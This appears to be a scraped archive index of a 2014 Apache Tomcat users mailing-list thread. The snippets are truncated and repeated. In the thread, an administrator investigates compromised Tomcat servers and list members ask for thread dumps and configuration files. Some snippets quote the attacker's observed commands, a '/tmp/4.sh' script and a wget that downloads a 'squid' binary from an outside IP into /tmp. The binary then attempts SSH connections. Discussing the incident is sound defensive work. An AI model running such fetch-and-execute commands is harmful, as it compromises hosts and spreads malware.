Re: Regarding i think an intrusion - Solved =)

t; >> >> 2014-05-07 12:28 GMT-03:00 Leonardo Santagostini > >: >> >> Hello all ! >>> >>> Developers are still "estimating the effort" for upgrading struts i >>> will let you know how things are going. >>> >>> T

Re: Regarding i think an intrusion

ot; for upgrading struts i >> will let you know how things are going. >> >> Thanks all for replying me. >> >> Regards, >> Leonardo >> >> Saludos.- >> Leonardo Santagostini >> >> <http://ar.linkedin.com/in/santagostini> >&

Re: Regarding i think an intrusion

> Saludos.- > Leonardo Santagostini > > <http://ar.linkedin.com/in/santagostini> > > > > > > 2014-05-05 15:39 GMT-03:00 Martin Gainty : > >> > Subject: Re: Regarding i think an intrusion >> > From: lsantagost...@gmail.com >> > To: users

Re: Regarding i think an intrusion

00 Martin Gainty : > > Subject: Re: Regarding i think an intrusion > > From: lsantagost...@gmail.com > > To: users@tomcat.apache.org > > > > Hello Chris, but this logfile was only one day. > MG>Ay Caramba! > > > > Maybe i had a concept mismatch tr

RE: Regarding i think an intrusion

> Subject: Re: Regarding i think an intrusion > From: lsantagost...@gmail.com > To: users@tomcat.apache.org > > Hello Chris, but this logfile was only one day. MG>Ay Caramba! > > Maybe i had a concept mismatch trying to capture the exact moment when the > execution

Re: Regarding i think an intrusion

Hello Chris, but this logfile was only one day. Maybe i had a concept mismatch trying to capture the exact moment when the execution begins. My command was while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v "127.0.0.1" | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea

Re: Regarding i think an intrusion

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 5/5/14, 11:12 AM, Leonardo Santagostini wrote: > Ok, again its uploaded. > > This is the link > > https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing 1/2 > GiB log file? Hrm. It doesn't even have any calls

Re: Regarding i think an intrusion

Ok, again its uploaded. This is the link https://drive.google.com/file/d/0B5oeFmSS7h7EOFE5Nk9KMmd4RFE/edit?usp=sharing Kind regards !, Leonardo Saludos.- Leonardo Santagostini 2014-05-05 11:57 GMT-03:00 Christopher Schultz : > -BEGIN PGP S

Re: Regarding i think an intrusion

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 5/5/14, 10:29 AM, Leonardo Santagostini wrote: > Well thread dump is here > > https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing Seems > like it's broken. - -chris -BEGIN PGP SIGNATURE- Version: Gn

Re: Regarding i think an intrusion

Well thread dump is here https://drive.google.com/file/d/0B5oeFmSS7h7EczdXMEF3eXRBSlk/edit?usp=sharing Let me know if im missing something. thanks ! Leonardo Saludos.- Leonardo Santagostini 2014-05-05 9:34 GMT-03:00 Leonardo Santagostini : > Hell

Re: Regarding i think an intrusion

Hello all, sorry for the late, but i was in holiday from wednesday. Ok, i make a ticket to developers for upgrading strus. They told me that will work on that. So, i will keep in touch with the news =) Again, thanks all for all the support you give me. Regards, Leonardo Saludos.- Leonardo Sant

Re: Regarding i think an intrusion

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cédric, On 5/1/14, 10:00 AM, Cédric Couralet wrote: > 2014-04-30 19:07 GMT+02:00 Christopher Schultz > > : > > Leonardo, > > On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: Im uploading mi logfiles so it will be available when finishe

Re: Regarding i think an intrusion

2014-04-30 19:07 GMT+02:00 Christopher Schultz : > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA256 > > Leonardo, > > On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: > > Im uploading mi logfiles so it will be available when finished > > uploading. > > Remember to get a thread dump while Runtim

Re: Regarding i think an intrusion

Hello Christopher, thanks for your response. I have a copy of 4.sh and squid (binary ELF file) and tried to see using strings what this program do. I couldn’t see anything =( Im monitoring the server for getting a dump at the moment this injection occurs. Files still uploanding =( Thanks for al

Re: Regarding i think an intrusion

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, On 4/30/14, 12:48 PM, Leonardo Santagostini wrote: > Im uploading mi logfiles so it will be available when finished > uploading. Remember to get a thread dump while Runtime.exec() is running. You should copy the script /tmp/4.sh somewher

Re: Regarding i think an intrusion

Hello Martin/Felix, Im uploading mi logfiles so it will be available when finished uploading. Regarding the configuration, its working in two other sites without problem, and there is no problem putting L4 balancing with haproxy. I have asked developers about that exploit, still without answer.

Re: Regarding i think an intrusion

On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini wrote: >Hello list, > >well my homework is done > >Here are the links: > >setenv.sh: http://pastebin.com/EN1mXDFi >catalina.sh: http://pastebin.com/1vRVLbSm >web.xml: http://pastebin.com/BqEfiXXm >server.xml: http://pastebin.com/wfzE8bYU >l

RE: Regarding i think an intrusion

> Date: Wed, 30 Apr 2014 12:35:52 -0300 > Subject: Re: Regarding i think an intrusion > From: lsantagost...@gmail.com > To: users@tomcat.apache.org > > Hello list, > > well my homework is done > > Here are the links: > > setenv.sh: http://paste

Re: Regarding i think an intrusion

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Leonardo, You need to post a thread dump as well. - -chris On 4/30/14, 11:35 AM, Leonardo Santagostini wrote: > Hello list, > > well my homework is done > > Here are the links: > > setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: > http://

Re: Regarding i think an intrusion

Hello list, well my homework is done Here are the links: setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: http://pastebin.com/1vRVLbSm web.xml: http://pastebin.com/BqEfiXXm server.xml: http://pastebin.com/wfzE8bYU logging.properties: http://pastebin.com/Qurk8sLU catalina.properties: http://p

Re: Regarding i think an intrusion

Ok, i will do the following: 1) thread dump of running tomcat instance 2) Pastebin the running tomcat config I think at mid day will have all the info. Thanks all for replying me and all the responses. Regards, Leonardo Saludos.- Leonardo Santagostini

Re: Regarding i think an intrusion

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Konstantin, On 4/29/14, 4:54 PM, Konstantin Kolinko wrote: > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini > : >> Hello Dan, >> >> Nop, the attacker is executing locally the following >> >> tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp

Re: Regarding i think an intrusion

2014-04-30 0:41 GMT+04:00 Leonardo Santagostini : > Hello Dan, > > Nop, the attacker is executing locally the following > > tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh > tomcat8893 8882 0 Apr27 ?00:00:00 wget > http://218.199.102.59/.xy/squid32 -O /tmp/squid > > And t

Re: Regarding i think an intrusion

sorry, but i forget to post /usr/java/default/bin/java -version java version "1.6.0_41" Java(TM) SE Runtime Environment (build 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode) Saludos.- Leonardo Santagostini 2014-04-29 1

Re: Regarding i think an intrusion

Hello Dan, Nop, the attacker is executing locally the following tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh tomcat8893 8882 0 Apr27 ?00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid And the launch squid who tries to connect via ssh to varoius places.

Re: Regarding i think an intrusion

On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini wrote: > Hello list, > > Im facing an issue in 6 tomcat server that are getting penetrated and they > are executing malicious scripts on my server. Can you share more about what they are doing? It might give some clues as to how they are ac

Re: Regarding i think an intrusion

Hi, I am learning to set up a server and I found this article about security http://mon-serveur.anael.eu/doku.php/securite/firewall_iptables On Tue, Apr 29, 2014 at 9:08 PM, Leonardo Santagostini < lsantagost...@gmail.com> wrote: > Hello list, > > Im facing an issue in 6 tomcat server that a